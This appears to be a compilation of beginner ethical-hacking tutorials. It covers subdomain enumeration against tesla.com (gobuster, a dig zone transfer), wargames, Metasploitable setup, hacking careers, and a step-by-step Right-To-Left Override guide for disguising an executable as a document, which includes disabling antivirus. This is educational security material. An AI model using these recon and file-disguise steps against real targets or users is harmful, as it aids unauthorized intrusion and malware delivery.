We just posted a course on the freeCodeCamp.org YouTube channel that will help you master the fundamentals of cybersecurity and ethical hacking. This is a beginner-friendly, hands-on course using Kali Linux.

You’ll learn to identify, exploit, and defend against real-world vulnerabilities while building a solid foundation in penetration testing, network security, and vulnerability assessment. By mastering professional tools like Nmap and Wireshark, you will develop the practical skills and mindset needed to secure systems and think like an ethical hacker. This course was created by Sunny Dimalu The Cyborg.

Here are the sections in this course:

• Introduction

• What is Kali Linux

• Basic Commands & Terminal Customization

• ls Command

• cd Command

• Nano Editor

• cat Command

• Create Files Using cat

• Create Directories

• grep Command

• wc Command

• Output Redirection

• Piping

• Copy Files

• Remove Files & Directories

• Types of Users

• Root User

• sudo Command (Administrative Tasks)

• ip addr Command

• Install Packages

• Remove Packages

• Introduction to Nmap

• Scan Ports

• Wi-Fi Security: System Requirements & Wireless Card

• Introduction to Aircrack-ng

• Monitor Mode vs Managed Mode

• Enable Monitor Mode

• Scan Wi-Fi Networks & Capture Traffic

• Scan 5GHz Wi-Fi Networks (Theory)

• Scan 5GHz Wi-Fi Networks (Practical)

• What is a 4-Way Handshake

• Capture a 4-Way Handshake

• What is a De-authentication Attack

• Capture 4-Way Handshake Using De-authentication Attack

• Wordlists & Dictionary Attacks

• Crack / Recover Wi-Fi Password

• Detect De-authentication Attacks /Threats

• Wireshark Tutorial

Watch the full course on the freeCodeCamp.org YouTube channel (4-hour watch).

As an ethical hacker, discovering subdomains is a critical step in learning the attack surface of a target. Subdomains might not be protected well, unlike the main domain. So they can be a great entry point for security auditing or bug bounty programs.

In this article, I’ll walk you through how to find subdomains using multiple methods. We will use tesla.com as our example in subdomain research.

Note: tesla.com is part of bug bounty programs, so we have permission to scan it for subdomains. If you are doing this in another web application, make sure you have permission.

Crt.sh

One of the easiest ways to start is by checking Certificate Transparency (CT) logs using crt.sh. This website records every SSL/TLS certificate issued for a domain, including subdomains.

To search for Tesla’s subdomains, visit crt.sh and enter %.tesla.com as the query. The % acts as a wildcard to match any subdomains.

Let's look at the results:

We can see a lot of interesting subdomains listed in the results. These subdomains may belong to different parts of Tesla’s infrastructure.

For example, shop.tesla.com is likely for their online store, while api.tesla.com could host application programming interfaces.

Using crt.sh is passive, meaning it doesn’t interact with the target, making it both safe and stealthy.

Note that crt.sh will only display subdomains that have valid certificates. If a subdomain uses self-signed certificates or doesn’t use SSL/TLS at all, it may not appear in these logs. Despite this limitation, crt.sh remains a quick and efficient starting point for subdomain enumeration.

Sublist3r

Sublist3r is an open-source tool to automate finding subdomains. It’s helpful in both security assessments and general reconnaissance.

By using multiple search engines (like Google, Bing, Yahoo, and more) Sublist3r finds subdomains that might otherwise remain hidden.

Sublist3r’s command-line interface is simple to use — you give it a domain, and Sublist3r goes to work.

Thanks to its open-source nature, it’s actively maintained and improved by the security community.

Sublist3r is not pre-installed on Kali, so lets go ahead and install it. First, clone the repository and install the requirements:

git clone https://github.com/aboul3la/Sublist3r.git
cd Sublist3r
sudo pip install -r requirements.txt

Now we are ready to use the sublist3r tool. Here is the syntax to use sublist3r:

python sublist3r.py -d tesla.com

After a few minutes, Sublist3r will return a list of discovered subdomains. The -d flag tells sublist3r that the domain to use is tesla.com

You can see that sublist3r has found more than 300 subdomains of tesla.com. Sublist3r is an excellent way to jump-start the recon process, especially if you want to automate the collection of subdomains without installing numerous separate tools.

Note that Sublist3r relies on the APIs of these search engines and other data sources. So it can sometimes miss subdomains that haven’t been crawled or indexed.

Google Dorking

Google dorking (sometimes called “Google hacking”) refers to the practice of using special search queries on Google. These operators help to find hidden information, sensitive data, or other resources that would otherwise be hard to locate.

Common operators include site:, inurl:, filetype:, and intitle:, among many others. Let’s start with the site: operator:

site:*.tesla.com

This query searches for any subdomain of tesla.com. Here are some search results.

To dig deeper, try combining site: with other operators. For example, we can use the inurl operator with the keyword ‘admin’ to find URLs containing the word admin.

site:*.tesla.com inurl:admi

By using these operators (known as Google dorks), you can filter search results to find specific file types, directories, or even private information that may be unintentionally exposed on the internet.

Dorking can produce a lot of data, so you may need to carefully filter your searches to avoid getting flooded with irrelevant information.

Here is a full tutorial on Google dorking.

Fuzzing with GoBuster

Now what if the subdomains of a target are not listed anywhere on the internet? We fuzz for it.

Fuzzing is simply brute-forcing potential subdomain names by trying combinations from a wordlist. A wordlist is a list of words that we will use along with the fuzzing tool to see if a subdomain exists.

A subdomain wordlist can contain words like:

ftp
root
admin
portal
api

Tools like Gobuster and Ffuf can use a wordlist to check whether these subdomains exist. Here is a sample subdomain wordlist.

How Gobuster Works

Gobuster is a fast brute-force tool for discovering hidden URLs, files, and directories within websites.

Ffuf is a wonderful web fuzzer, but Gobuster is a faster and more flexible alternative. Gobuster has support for extensions with which we can increase its capabilities.

Gobuster also can scale using multiple threads and perform parallel scans to speed up results.

Gobuster comes pre-installed in Kali Linux. Let’s run the following command to look for subdomains. You can find the word list under /usr/share/wordlists/SecLists in Kali Linux.

gobuster dns -d tesla.com -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt

The above command checks each word in the wordlist to see if it resolves to a valid subdomain. Here’s a sample output:

Gobuster’s results show valid subdomains, including some that might not appear in public databases, like staging.tesla.com or dev.tesla.com.

Fuzzing should be combined with other methods since the results are only as good as the wordlist. For example, prod-version-2.tesla.com can be a subdomain which may not be a part of the wordlist.

Other Methods for Subdomain Discovery

DNS Zone Transfers

While rare, misconfigured DNS servers can allow zone transfers, revealing all subdomains at once. You can test this using dig:

dig axfr @ns1.tesla.com tesla.com

If the server is properly secured, it won’t allow a zone transfer. But if it’s misconfigured, you might uncover every subdomain Tesla uses.

Online Tools

Websites like SecurityTrails, Shodan, and Censys aggregate subdomain data. These tools provide a centralized view of publicly available information.

Inspecting JavaScript Files

Subdomains often appear in a website’s JavaScript files. By examining Tesla’s website, you might find references to API endpoints or other subdomains.

Post-Subdomain Discovery

Once you have a list of subdomains, we can probe them further. We may discover sign-in portals, development pages, or API endpoints.

Ethical hackers typically use port scanning and service enumeration tools like Nmap and Nikto to find the open ports and running services on each subdomain. Identifying outdated software, insecure protocols, or default credentials is often the next critical step, as these are common weak points in any environment.

Subdomains often show us the broader infrastructure of the website if they are left unprotected.

Conclusion

Subdomain discovery is a critical skill for ethical hackers. It helps us understand the complete picture of a web application. The more we know, the better entry points we have to gain access.

Before using these techniques, always ensure you have proper authorization. Subdomain discovery helps with security audits by uncovering hidden assets and helping organizations protect themselves from potential threats.

For more practical tutorials on cybersecurity, join our weekly newsletter. If you want to practice these subdomain discovery techniques through a hands-on lab, join us at the Hacker’s Hub.

But real hacking isn’t quite like that. It takes patience, creativity, and most importantly, a lot of practice.

One of the best ways to sharpen your hacking skills is by playing wargames. They are interactive hacking challenges that push your problem-solving abilities. Of the many online wargames, OverTheWire is the best. It is fun, educational, and accessible for both beginners and expert hackers.

In this article, we’ll explore why OverTheWire is such a fantastic resource. Whether you’re new to hacking or want to test your skills, OverTheWire will have something for you.

What are Wargames?

In cybersecurity, wargames are exercises. They simulate attacking and defending computer systems. These games often mimic real-life scenarios. They help you improve your skills without real-world risks.

Wargames can take different forms. Capture the Flag (CTF) is a common type. Players solve challenges to find hidden “flags” in the system. In attack-defense games, teams protect their systems while trying to compromise the opponent’s. In incident response wargames, defenders react to a simulated cyberattack and work to recover.

Wargames give you hands-on experience in cybersecurity. They teach you how to solve problems, think critically, and handle pressure while working in teams. These exercises are valuable for building real-world skills.

What is OverTheWire?

OverTheWire is an online platform that offers a collection of wargames. These wargames teach you the basics of cybersecurity through hands-on challenges.

The site hosts several different games, each focusing on different aspects of hacking. You will encounter everything from basic Linux commands to more advanced topics.

OverTheWire wargames are progressive. This means that they start out easy and gradually get harder as you advance through the levels.

If you’re just starting out, this makes the learning curve manageable. But don’t worry, the more complex challenges will give even seasoned hackers something to chew on.

OverTheWire doesn’t just stick to one type of challenge. As you progress through different games, you’ll encounter a wide array of topics. These include Linux fundamentals, networking, file manipulation, scripting, and many others.

Some games, like Narnia, exploit buffer overflows. Others, like Krypton, dive into cryptography. This variety ensures you get a well-rounded education in different aspects of cybersecurity.

OverTheWire has a large, active community. While the wargames encourage you to solve problems on your own, there is no shortage of help when you need it.

The official forums are great for asking questions and sharing insights. You can also discuss tricky levels with other players.

While the community can help, solving the challenges yourself is the best way to learn. Looking up answers too early can take away from the experience.

Wargames You Should Try

Let’s take a quick look at some of the key wargames on OverTheWire that you can start playing today.

Bandit

Bandit is the entry point for most people. Bandit teaches you basic Linux commands, file manipulation, and navigation. It’s a perfect place to start if you’ve never used the terminal before or if you want to brush up on fundamental skills.

For example, in one of the early Bandit levels, you are given a password hidden inside a text file. The challenge is finding the file, reading its contents, and then using that information to advance to the next level.

Leviathan

Leviathan is more advanced. It teaches you about binary analysis and how to find vulnerabilities in programs. Players solve puzzles that require reverse engineering, debugging, and exploiting weaknesses. It’s a great way to practice finding and fixing security flaws in software.

Narnia

If you want to learn about buffer overflows and binary exploitation, Narnia will teach you both. It starts with simple vulnerabilities and gradually increases in difficulty. You’ll learn how to exploit code to gain control over programs and escalate privileges.

Conclusion

OverTheWire is a fantastic resource for anyone interested in ethical hacking. The platform offers a structured, hands-on way to build up your cybersecurity skills. It’s not just about solving puzzles, it’s about learning how to think like a hacker.

So, if you want to sharpen your problem-solving skills, improve your technical knowledge, or just have some fun breaking into systems (legally), give OverTheWire a try. You’ll learn a lot, and who knows, you might just become the next great cybersecurity expert!

For more articles on Cybersecurity, join our weekly newsletter Stealth Security.

So you’ve discovered the world of ethical hacking and you want to try your hands on something. Trouble is, doing some ‘practical application’ on the wrong thing could get you fined, arrested, and even undesired jail time.

You don’t have to give up your dreams just yet though. There is a legal, ethical way to sharpen your cyber offensive skills: Vulnerable Virtual Machines.

In this tutorial, we’ll take a look at the following:

1. What is a Virtual Machine?
2. What is Metasploitable?
3. How to Set Up Metasploitable
4. A Quick Word on Vulnerable VMs

So without further ado, let’s jump in.

What is a Virtual Machine?

Virtual Machines ¦ Credit: [Hackersarts](https://www.deviantart.com/hackersarts" rel="noopener noreferrer)

A Virtual Machine (VM) is an emulation of a computer system. Think of it like a mini disposable environment where you can play around with different operating systems and software.

On a VM, you can delete critical system files, test software, or even install a virus (not recommended), and nothing will happen to your actual system.

All this is made possible with a hypervisor, a software that takes some of your ‘host’ system’s hardware resources, and makes it available for the ‘guest’ machine. A hypervisor allows you to determine things like how much RAM, storage, and even screens (if you have multiple displays), you want to hand over to the VM.

There are 2 types of hypervisors, namely:

• Type 1 hypervisors
• Type 2 hypervisors

Mind blowing naming scheme, I know.

Type 1 hypervisors run directly on the physical host machine and have direct access to hardware resources. They tend to be used for servers and enterprise-level infrastructure. They are considered more efficient because of their direct access to the host resources. Examples of type 1 hypervisors include Microsoft Hyper-V and VMware ESXi.

Type 2 hypervisors, on the other hand, are installed on the host OS, and manages the hardware resources for the guest. You would find these on personal computers and they make hardware resource management pretty easy for the average user. Examples of type 2 hypervisors are Oracle VirtualBox (my personal favourite 😌) and VMware Workstation.

We’ll be using Oracle VirtualBox, a type 2 hypervisor, for simplicity (and because I don’t have a server randomly lying around the house). Now, let’s find an appropriate vulnerable VM to install.

What is Metasploitable?

A mere box ¦ Credit: [Rostislav Uzunov](https://www.pexels.com/@rostislav/" rel="noopener noreferrer)

Metasploitable is an ‘intentionally vulnerable virtual machine’ by Rapid7, owners of the popular security project, Metasploit. Note that Metasploitable and Metasploit are two different things entirely. The previous is a VM while the latter is a cyber offense tool (which may or may not be covered in a later article 😉).

VMs, much like any other computer, need to be as secure as possible. Metasploitable does the complete opposite. It comes out of the box with enough vulnerabilities to give the cybersecurity professionals at CYSED serious nightmares. The VM is a Linux-based system with various ports open, insecure configurations, and outdated software.

Now, let’s figure out how to install it securely on our systems.

How to Set Up Metasploitable

The metasploitable interface ¦ Credit: Author

Before we go further, you’re going to need a few things:

• An Internet Connection
• A Computer with at least 8 GB RAM and 20 GB free storage
• A flair to be an awesome geek

And with those boxes checked, let’s get started.

To download the VM, head over to Google and type in ‘Metasploitable download’. Click on the first link by SourceForge, and hit download. The file is about 800 megabytes so feel free to pull up an episode of Scooby-Doo while that’s downloading.

You should have a zip file like this once that is done:

The metasploitable zip file ¦ Credit: Author

Right-click and hit ‘Extract All…’ to get the VM Disk. You should see some files like this:

The zip file contents ¦ Credit: Author

We’re going to need VirtualBox to install our VM. You can quickly setup VirtualBox using this tutorial by Beau Carnes. To import Metasploitable, open VirtualBox and click on ‘New’. Set the following options:

Name: Metasploitable (or whatever you like)

Type: Linux

Version: Other Linux (64-bit)

You don't have to select an ISO image because the OS is already in the virtual hard disk which will be installed as we go along.

Setting up the VM ¦ Credit: Author

Click on ‘Next’, which should take you to the hardware section. As mentioned before, a VM is a simulation of the real system, which requires resources like RAM and a Processor. You can change the amount of RAM and logical processors your VM uses.

Keep in mind that the more resources you allocate to the VM, the less resources you have for your system.

On that note, I would suggest leaving the default hardware settings.

Deciding how much hardware we need ¦ Credit: Author

Quick lesson: Your system likely only has 1 physical processor but can have as many as 8 or more logical processors. This is because of something called hyperthreading, where a computer basically converts it’s physical cores into multiple smaller virtual ones. Now back to the tutorial.

Click ‘Next’ and you’ll be directed to the ‘Virtual Hard disk’ section. Normally, you’d create a virtual hard disk for your VM but we already have one.

Click on ‘Use an Existing Virtual Hard Disk File’ and hit ‘Add’ at the top right.

Selecting a Virtual hard disk ¦ Credit: Author

This will open up File Explorer, where you will proceed to select the ‘Metasploitable.vmdk’ file. Once that is done, Metasploitable should appear under the ‘Not Attached’ list.

Selecting the Metasploitable hard disk ¦ Credit: Author

Select it, hit ‘Choose’ and click on ‘Next’. You will be led to a ‘Summary’ section which will give you information about the VM before it is finally setup.

Putting in the final touches ¦ Credit: Author

Let’s finish it up by literally hitting ‘Finish’ and you should get a screen like so.

Metasploitable installed on VirtualBox ¦ Credit: Author

Congratulations on setting up Metasploitable 🎉. Now you can build your cybersecurity skills without risking a trip to your local prison 😉.

The credentials for the machine are msfadmin:msfadmin. Feel free to boot up your Kali machine, ping the machines, and start hacking. Here, I’ll give you a hint: It starts with ‘nmap’ 👁️.

A Quick Word on Vulnerable Machines

A network of sorts ¦ Credit: [AcatXIo](https://pixabay.com/users/acatxio-20233758/" rel="noopener noreferrer)

Just like a real system, a virtual machine is vulnerable to real world attacks. Try not to leave Metasploitable up when not in use and definitely do not expose it to an untrusted network.

By default, the VM is set to use NAT (Network Address Translation) which adds a layer of security by isolating it from the external network while providing it access to the internet.

However, this may not be a comprehensive solution. One common alternative is to change the network adapter settings to ‘Host-Only’, which shuts the VM off from the Internet but allows it to communicate with other VMs and the host.

If you’re wondering what the other options are, here is a quick summary for each:

• NAT: Shares host network, provides internet access to VM.
• Bridged Adapter: VM connects directly to the physical network.
• Internal Network: Isolated network for VMs on the same host.
• Host-Only Adapter: VMs communicate with host and among themselves.
• Generic Driver: Allows using custom, non-standard network drivers.
• NAT Network: Similar to NAT but allows defining network properties.
• Cloud Network: Experimental feature for cloud-based networking.
• Not Attached: No network connection for the virtual machine.

Conclusion

And now, let’s summarize what you’ve learned in this tutorial:

1. What a Virtual Machine is and how it works
2. What Metasploitable is
3. How to install Metasploitable and any other VM
4. What different network adapters do in VirtualBox

Playing with Metasploitable is a great way to practice offensive cybersecurity skills and the defensive if you want to try and patch it up. Vulnhub is a great place to download more virtual machines if you want to move beyond Metasploitable.

You could also use platforms like TryHackMe and HackTheBox which are gamified and make things more fun if you want something a little different.

Good luck and Happy Hacking 🙃

Resources

1. Learn more about Cybersecurity in Africa
2. The Metasploitable Exploitability Guide from Rapid7

Acknowledgements

Thanks to Anuoluwapo Victor, Chinaza Nwukwa, Holumidey Mercy, Favour Ojo, Georgina Awani, and my family for the inspiration, support and knowledge used to put this post together. You’re all amazing.

Cover image credit: Google DeepMind

These challenges in the tech space have led to the emergence of the term ethical hacking. The purpose of this field is to do what the cybercriminals are doing, but this time around with good intentions with the goal to stop the criminal acts.

Ethical hacking primarily involves identifying and fixing weaknesses to prevent cyber attacks and protect infrastructure.

A Little Background

I don't know about you, but my journey into tech was inspired by the term "hacker". I know what you are thinking, but hear me out.

I grew up in an environment where the internet and access to technology were limited, and just like any other kid my career options were limited to the most glorified paths in a common African household, that is: Doctor, Engineer, Pilot, etc... ask any kid from an African household, and I bet these are the paths their parents wanted them to pursue.

But this ideology was changed by two things: my love for movies and my neighbor's computer. I would spend most of my time watching movies at my friend's place and I would take note of specific things, like how technology played a role in outsmarting the bad guys. This concept would later on push me to venture into the tech.

My interest in cybersecurity, on the other hand, was inspired by watching my friends play games. Remember the old-day fun games like GTA, Mortal Kombat, and Roadrash? Yep, those games. One thing that was common in these games was that they all had cheat codes that would help you cheat through a mission.

I wanted to learn more about how this was possible. But whenever I asked, the response I got was, "The game is hacked that's why we are able to cheat and finish quickly".

Now I hope you understand why I said the term hacker inspired me. Basically at first, I wanted to venture into the field to learn how to hack my way through games. But with more research and learning, my understanding of the term changed quite a bit.

And that's what we will be discussing in this article: A cybersecurity definition of what it means to be an Ethical Hacker and its importance.

We'll also take a look at the different types of ethical hacking, the roles of an ethical hacker, the skills they need, the challenges they face in the field, and what exactly you should learn to pursue a successful career in this cybersecurity.

By the end of this article, you should have a clear understanding of what exactly ethical hacking is all about and how you can use it to protect not only yourself but also your family, friends, and organization from cyber threats.

Let's get started!

What is Hacking?

Before we define the term Ethical Hacking, we first need to understand what we mean by the term hacking. Hacking has been in existence since the early days of computer development. The only difference is that back in the day, hacking was done as a way to help people learn how computers functioned and what they machines could do.

Now, as technology continued to evolve, the experimentation that was meant for learning and understanding purposes evolved too. It gave rise to people exploiting the systems for their personal gain. This is where the common definition of the term Hacking comes from.

For simplicity, I would describe "hacking" as the illegal process of gaining access/breaking into a computer system or network without the owner's permission for personal gain.

Different Types of Hackers

We have different types of hackers, and they include:

• Black Hat Hackers - They break into a system without the owner's permission for personal gain or malicious intent.

• Gray Hat Hackers - They break into a computer system/network without the owner's permission but they don't mean any harm. They may choose to inform the owner of the vulnerabilities or even use the skills for personal gain.

• Script Kiddie - Also known as Amateurs. They are attackers with little or no hacking skills They mostly rely on existing tools and available online instructions and scripts to launch an attack. It's worth noting as most of them are not aware of what they are doing, their acts may result in devastating results.

• Organized Hackers - Also known as hacker groups or hacker collectives. These hackers are a group of individuals who work together to conduct an attack against a specific target to achieve a common goal. These groups can be categorized into a few categories: – Cybercriminals – Hacktivists – State-sponsored hackers

The most commonly known of these groups include Anonymous, Lizard Squad, and APT groups. It's important to note that these groups are illegal and their acts may cause serious harm to individuals, organizations, and governments.

• White Hat Hackers - Also known as Ethical Hackers. They break into a system with the owner's permission. Their main task is to identify vulnerabilities and fix them to avoid exploitation from the outside. We'll learn more about them in the coming sections.

What is Ethical Hacking?

To counter these malicious practices, organizations and governments realized the need for security professionals whose sole purpose was to protect the systems from unauthorized access. Their roles also included testing the systems to ensure they were safe.

That's how the term ethical hacking came into existence. And from there people started pursuing it as a career.

With this brief explanation, we can define Ethical hacking as breaking into a computer system/network with the permission of the system/network owner with the sole purpose of identifying weaknesses that might be exploited or used for malicious intentions.

The main goal of ethical hacking is to identify potential security threats and fix them before they can be used for malicious acts. Ethical hacking also involves "penetration testing" or "pen testing". People who practice it are known as Ethical Hackers or White hat hackers.

Different Types of Ethical Hacking

We do have different types of ethical hacking, and the most common ones include:

• Network hacking - This type of attack involves testing the security of an organization's infrastructure, firewalls, and other networking devices.
• Web application hacking - Involves testing for vulnerabilities in an organization's web applications such as e-commerce sites, online banking platforms, and other web-based services.
• Social engineering - Involves testing how likely it is that employees will fall for phishing attacks and other social engineering techniques.
• Wireless hacking - Involves testing the wireless security of organizations and how likely it is to be the point of attack.
• Physical penetration testing - Involves testing the organization's physical premises security including data centers and other facilities.

Role of an Ethical Hacker

Being an ehthical hacker involves many tasks. But their primary role is to help identify vulnerabilities in the system before they are exploited by malicious hackers. By doing this, the affected parties are able to improve security and prevent any form of cyber attack.

In addition to this, other tasks include:

• Vulnerability assessment
• Enhance security awareness in their respective organization
• Ensure compliance with the industry regulation and standards
• Security research and development
• Ensure there is minimal risk of data breaches and other security incidents.
• Training and education - ethical hackers spend better part of their time creating awareness about cybersecurity and how to prevent the attacks.

Benefits of Ethical Hacking

Ethical Hacking plays a crucial role in preventing cyber attacks. The main idea behind this is to use the same tools and techniques used by attackers to identify vulnerabilities. The good thing is that it has proven to play a major role in many organizations in a positive way.

In addition to helping identify vulnerabilities and helping organizations improve their security, ethical hacking can provide a wide range of benefits including:

• Mitigating risks - this can help prevent data breaches, cyber attacks and other security incidents.
• Cost effective - ethical hacking is a cost effective way for an organization to test their security systems.
• Compliance - ethical hacking can help an organization ensure that they meet the required compliance requirements and avoid costly penalties.
• Continuous Improvement - ethical hacking is not a one time process. It's an evolving field, meaning there will be new risks each day. Having an ethical hacker in place can help ensure security is up to date with the latest technologies.

Challenges of Ethical Hacking

Just like any other career, the ethical hacking field has some challenges too. These challenges can range from legal and ethical to technical issues, which from time to time need to be addressed to ensure success in the testing and the work itself.

The most common problem that faces many people is how to correctly navigate the legal and ethical considerations around the field. As much as ethical hacking is legal in many countries, it is still important to ensure that everything is done within the bounds of the law. You have to be extra careful not to fall on the wrong side of the law.

In addition to adhering to specific countries' laws, ethical hackers should also adhere to strict ethical standards, which regulate and ensure their activities do not cause any harm.

Another common challenge is obtaining the proper authorizations and credentials to conduct the testing. As much as we live in a free world, you just can't decide to perform an ethical test because you have the skills. You need to have written consent showing that you have permission to conduct the test.

Having credentials like certificates can also help during job hunting. But this comes as a challenge to those who can't afford to pay for such certifications.

Speaking of technical challenges, the primary technical challenge that most ethical hackers face is identifying vulnerabilities in complex systems. If you want to be an efficient ethical hacker, you must be proficient in various technologies including programming languages, security tools, and so on. This enables you to have a strong understanding of the network architecture and protocols making it easy to find vulnerabilities.

Prioritizing can also be a big challenge at some point. In a scenario where there are many vulnerabilities within a system, since all may pose a serious threat, it may be a challenge for the ethical hacker to prioritize which needs to be tended to first.

Ethical Hacking Certifications and Training

In order for one to become an ethical hacker, having a solid understanding of computer systems, networks, and programming languages is essential. The good thing is that you can gain these skills through formal education, practical experience, online certifications, training, and so on.

The most preferred method by many employers is going through certifications from recognized bodies. In this industry, there are multiple certificates and learning resources, so if you are looking at where to get started you might want to try out these platforms for both certificates and knowledge.

Learning platforms

• Cybrary
• HackTheBox
• Metasploit Unleashed
• SANS Institute
• Offensive Security
• HackThisSite
• TryHackMe
• EC-Council

YouTube Channels

• HackerSploit
• The Cyber Mentor
• John Hammond
• LiveOverflow
• Null Byte

Practice platforms

• CyberPatriot
• National Cyber League
• Capture the Flag (CTF)
• HackTheBox
• DEF CON CTF
• Cyber FastTrack
• BSides CTF

Certifications

• International Council of Electronic Commerce Consultants (EC-Council) - offers certifications such as Certified Ethical Hacker (CEH), Certified Network Defender (CND), and Certified Chief Information Security Officer (CCISO).
• Offensive Security - offers certifications such as Offensive Security Certified Professional (OSCP) and Offensive Security Wireless Professional (OSWP).
• International Information System Security Certification Consortium (ISC)² - offers certifications such as Certified Information Systems Security Professional (CISSP), Certified Cloud Security Professional (CCSP), and Systems Security Certified Practitioner (SSCP).
• Global Information Assurance Certification (GIAC) - offers certifications such as GIAC Penetration Tester (GPEN), GIAC Certified Incident Handler (GCIH), and GIAC Certified Forensic Analyst (GCFA).
• CompTIA - offers certifications such as CompTIA Security+, CompTIA Cybersecurity Analyst (CySA+), and CompTIA Advanced Security Practitioner (CASP+).
• Cisco - offers certifications such as Cisco Certified Network Associate Security (CCNA Security), Cisco Certified Network Professional Security (CCNP Security), and Cisco Certified CyberOps Associate.

Conclusion

As tech continues to evolve so do the cyber threats. This means that organizations must invest in cybersecurity strategies to help prevent any form of exploitation. After all, prevention is better than cure. Taking early measures might come in handy along the way, saving you more than you can imagine.

Given the importance of ethical hacking in ensuring security, we should all take it very seriously. This involves using secure networks and encrypted networks, enabling advanced layers of protection like 2FA and MFA, investing in qualified security personnel, and constantly creating awareness amongst employees and communities at large.

By following these steps we will be able to improve on our security and protect our sensitive data, minimizing the risk of being victims of cyber attacks.

Keep Safe 🛡️.

Malicious hackers look for all kinds of underhanded tricks to make everyday users victims as a result of common mistakes. They might get someone to click the wrong link, open the wrong website, or execute the wrong program.

Most times, it’s easy to identify a suspicious file by the following:

1. The icon does not match the name
2. The extension seems incorrect
3. The file is noticeably bigger or smaller than its proposed file type (Imagine an image of 50mb 🤯)

But would you be suspicious of a file like this?

A totally non-suspicious file | Credit: Mercury

Nothing out of the ordinary right? Seems like your average word document. Let’s take a closer look at things.

Properties of the file | Credit: Mercury

In this tutorial, you’ll learn:

1. What Right-To-Left Override is
2. How to use it to hide file extensions
3. How to detect if it was used on a file
4. Mitigations

Friendly Disclaimer: This is simply for educational purposes only and is written solely to protect individuals, businesses, and organisations from threat actors. If you still wish to use this in any other way, that's your choice...just get ready for a lovely trip to jail…for a long time. 🙂

And with that intro, let’s jump in 🙃

What is Right-To-Left Override?

When nothing goes right, go left | Credit: [Wallpaperflare.com](http://wallpaperflare.com/" style="box-sizing: inherit; margin: 0px; padding: 0px; border: 0px; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; line-height: inherit; font-family: inherit; font-size: 17.6px; vertical-align: baseline; background-color: transparent; color: var(--gray90); text-decoration: underline; cursor: pointer; word-break: break-word;)

Right-To-Left Override (RTO or RTLO) is a Unicode non-printing character used to write languages read in the right-to-left manner. It takes the input and literally just flips the text the other way round. Such languages include Hebrew, Arabic, Aramaic, and Urdu.

You can find the character in the character map in both Windows and Linux using the code [202E].

Character map | Credit: Mercury

Below is a demonstration of how it is used:

RTLO Demonstration | Credit: Mercury

As you may see, the two statements typed are the exact same thing, except that the one below is written in the inverse because the RTLO character was inserted before typing it.

How RTLO Can Be a Malicious Tool

Perhaps at first glance this character looks innocent enough. What’s the harm in flipping some text anyway? The answer: File extensions.

A Chrome installer as an installer and word document | Credit: Mercury

Below are some hacks carried out in the past using this technique:

1. Telegram: In 2018, Kaspersky reported in a blogpost on Securelist that Russian cybercriminals exploited RTLO gaps in the wild on Telegram Windows Clients. As demonstrated in the article, this allowed the criminals to install cryptominers or RATs when a user opened what seemed to be a harmless file ⛏️.
2. Scarlet Mimic: In 2016, Unit 42 from Palo Alto Networks released a report on the tactics of a threat group known as Scarlet Mimic. The group is commonly known for targeting minority activists. According to the report, one of the groups common tactics included using RTLO characters to mask the actual file extensions of self-extracting archives (SFX/SEA)🎭.
3. Famous Messaging apps: In 2022, Bleeping computer released a news article about phishing techniques on messaging and email platforms using RTLO. Platforms such as iMessage, WhatsApp, Signal, and Facebook Messenger (I wonder who uses the last one 🤨) were vulnerable to such tactics. It allowed an attacker to inject an RTLO character in between two links. On the left was a legitimate domain such as (google.com) and on the right was a malicious one. This made it appear as one link and if a user clicked on the left side, they were safe. However, if they clicked on the right side, they were not.
4. PLEAD: In 2017, Trend Micro released an article on three campaigns performed by a threat group known as BlackTech. One of these campaigns was named PLEAD, which focused on information theft and was targeted at the Taiwanese government and organisations. According to the article, spear-phishing emails were used to deliver and install a backdoor. The notable part of this attack was that the installers where disguised as documents using RTLO characters and decoy documents were also added to trick users 📄.
5. Apple’s OS X: Despite being common in Windows, this technique could be used to target Mac users. In 2013, a blogpost by F-Secure Labs revealed that RTLO was used to disguise a relatively mild Mac malware in the wild. However, the malware screams ‘I’m a virus!’ due to the fact that OS X shows the real file extension and when run, the file quarantine notification is written backwards (Nice one Apple 😉🍎).

How to Hide a Potentially Malicious File

A Guy Fawkes Mask | Credit: [Wallpaperflare.com](http://wallpaperflare.com/" style="box-sizing: inherit; margin: 0px; padding: 0px; border: 0px; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; line-height: inherit; font-family: inherit; font-size: 17.6px; vertical-align: baseline; background-color: transparent; color: var(--gray90); text-decoration: underline; cursor: pointer; word-break: break-word;)

RTLO can be used in any attack that leverages tricking the user about written text. As we saw in the above hacks, links, email attachments and executable scripts and files are the most common attack vectors.

But this tutorial will focus on locally hosted files because it gives the basic idea and its variations can be used to carry out other attacks.

There are two steps to the process:

1. Insert the RTLO character in the file name
2. Change the file icon

The file icon needs to be changed to mimic the fake extension to make it easier to trick a user.

Below are the prerequisites for the procedure:

1. An executable or script – The payload
2. A file icon – Part of the bait
3. Resource hacker – To change the file icon

The file icon could be in .exe, .dll, .res, or .ico format. You can download some from here. And now, let the chaos begin ⚠️.

Step 1 – Insert the RTLO character

Choose a file of your liking and open it in Windows Explorer. Open the Character Map app on Windows and check the ‘Advanced View’ box. In the ‘Go to Unicode’ option, type in 202E. Hit the ‘Select’ and ‘Copy’ buttons respectively and go to the file you want to modify.

Selecting the Right-To-Left Override Character | Credit: Mercury

Here is the tricky part 🎃. When typing with the RTLO character, it types from right-to-left. This can be confusing when trying to rename the file. If you want to rename a file after injecting the character, spell it backwards.

For example, if you want to write the extension ‘.pdf’, you have to type it as ‘fdp.’ It takes some time getting used to but it's easy after a few tries.

Short renaming demonstration | Credit: Mercury

In File Explorer, check the option to show file extensions. Go to the file, right-click and hit rename. Change the name to whatever you want but make sure not to ever edit the extension itself so the file works as intended❗.

Set the cursor just before the extension name. Paste the RTLO character. You will observe it seems like nothing happened but that’s how it is supposed to look. Next type in ‘xcod’ to get ‘docx’ and hit enter.

Renaming the target file | Credit: Mercury

Step 2 – Change the Icon

Now for the final part of our amazing trick – changing the icon 🪄. Download and install a software called resource hacker. Open it and hit Ctrl + O. Next, select your target program. There’s a lot of information here that we can edit, but we just want to focus on the icon.

Resource Hacker | Credit: Mercury

Hit Ctrl+R to open the replace window and click on the ‘Open file with new icon’ button.

In the Explorer, select the file icon you wish to replace on the program and hit the ‘Replace’ button.

Lastly, hit Ctrl+S to save the file. If you have an Antivirus, you might want to temporarily switch it off before saving the file.

